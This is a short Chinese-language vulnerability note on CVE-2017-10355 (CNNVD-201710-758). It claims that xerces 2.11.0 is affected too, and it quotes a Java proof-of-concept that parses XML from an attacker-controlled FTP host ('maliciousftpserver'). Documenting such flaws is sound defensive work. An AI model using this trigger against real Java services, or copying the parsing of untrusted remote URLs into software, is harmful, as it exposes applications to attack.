CNNVD-201710-758

对应CVE-2017-10355

在国家漏洞库的官方描述中，只提到该漏洞影响到组件（Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15） 但在利用代码可见，漏洞同样影响xerces: 2.11.0

    private void parseXmlFile() {
     //get the factory
     DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
     try {
      //Using factory get an instance of document builder
      DocumentBuilder db = dbf.newDocumentBuilder();
      //parse using builder to get DOM representation of the XML file
      dom = db.parse("ftp://maliciousftpserver/test.xml"); // - FTP URL controlled by the attacker
     } catch (ParserConfigurationException pce) {
      pce.printStackTrace();
     } catch (SAXException se) {
      se.printStackTrace();
     } catch (IOException ioe) {
      ioe.printStackTrace();
     }
    }